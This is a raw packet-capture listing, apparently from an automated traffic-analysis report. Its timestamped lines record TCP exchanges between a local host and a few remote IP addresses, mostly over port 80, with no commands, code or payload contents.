                                                                                                                                      Oct 7, 2024 03:23:19.214951038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214962006 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214965105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.214972019 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214983940 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.214988947 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215002060 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215012074 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215013027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215022087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215032101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215039968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215048075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215064049 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215065956 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215075970 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215085983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215087891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215099096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.215111017 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.215137959 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.261317015 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.261328936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.261388063 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.265925884 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.265938997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.265978098 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.265990973 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.266028881 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.266041994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.266051054 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.266068935 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.266079903 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.266099930 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.270698071 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.270709038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.270719051 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.270737886 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.270756960 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.270817041 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.270828962 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.270858049 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.270879984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.275438070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.275449991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.275458097 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.275516033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.275528908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.275536060 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.275576115 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.280194998 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.280206919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.280215979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.280227900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.280239105 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.280267000 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.280297995 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.284914017 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.284930944 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.284940004 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.284950972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.284955025 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.284960985 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.284972906 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.284992933 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.289689064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.289700031 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.289746046 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.294444084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.294507027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.294615984 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.294627905 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.294655085 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.294665098 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.299129009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.299140930 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.299180984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.299328089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.299340010 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.299370050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.299391031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.303836107 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.303848982 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.303858995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.303884029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.303896904 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.304078102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.304090023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.304099083 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.304122925 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.304145098 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.308545113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.308557987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.308592081 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.308604002 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.308845997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.308857918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.309103012 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.313226938 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.313267946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.313544035 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.313558102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.313569069 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.313577890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.313591957 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.313616991 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.318284035 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.318295956 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.318305969 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.318331003 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.318356037 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.322716951 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.322787046 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.323050976 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.323062897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.323072910 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.323101044 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.323117971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.327523947 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.327534914 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.327575922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.327604055 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.327768087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.327780008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.327789068 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.327821970 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.327873945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.332304001 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.332478046 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.332489967 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.332499027 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.332508087 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.332526922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.332528114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.332551956 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.332573891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.337188959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.337201118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.337208986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.337239981 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.337261915 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.370465040 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.371699095 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.374880075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.374891043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.374937057 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.375185966 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.375197887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.375207901 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.375267029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.375267029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.376636982 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379014015 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379595041 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379605055 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379645109 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.379899979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379909992 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.379945040 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.384299994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.384315014 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.384366989 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.384607077 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.384618044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.384628057 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.384639025 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.384670973 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.389020920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.389031887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.389082909 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.389314890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.389329910 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.389370918 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.393749952 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.393762112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.393800974 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.393814087 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.395831108 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:19.395843983 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398463011 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398474932 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398483038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398515940 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.398673058 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.398689985 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398700953 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.398734093 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.398749113 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.399585962 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.399661064 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:19.401335955 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:19.401515007 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403175116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403187037 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403198957 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403225899 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.403249025 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.403395891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403414965 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.403453112 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.403472900 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.403700113 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.403724909 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.404159069 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.404164076 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.407879114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.407891035 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.407901049 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.407988071 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.407988071 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.408098936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.408111095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.408150911 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.412607908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.412620068 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.412630081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.412667036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.412677050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.412787914 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.412800074 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.412834883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.417342901 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.417354107 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.417406082 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.422230959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.422243118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.422250986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.422350883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.422350883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.426820993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.426836014 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.426882029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.426958084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.426970005 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.426979065 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427005053 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427016020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427198887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427208900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427217960 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427228928 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427234888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427241087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427242994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427253008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427253962 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427263975 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427268028 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427273035 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427283049 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427284956 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427292109 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427303076 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427310944 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427313089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427320957 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427323103 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427331924 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427336931 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427350998 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427357912 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427362919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427373886 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427388906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427395105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427395105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427400112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427412033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427418947 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427423000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427432060 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427438021 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427442074 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427452087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427458048 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427462101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427470922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427472115 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427486897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427494049 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427495956 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427506924 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427512884 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427516937 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427525997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427530050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427537918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427548885 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427550077 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427560091 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427571058 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427577019 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427582026 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427582026 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427593946 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427603006 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427608013 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.427613974 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427624941 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.427633047 CEST4987980192.168.2.4185.215.113.103
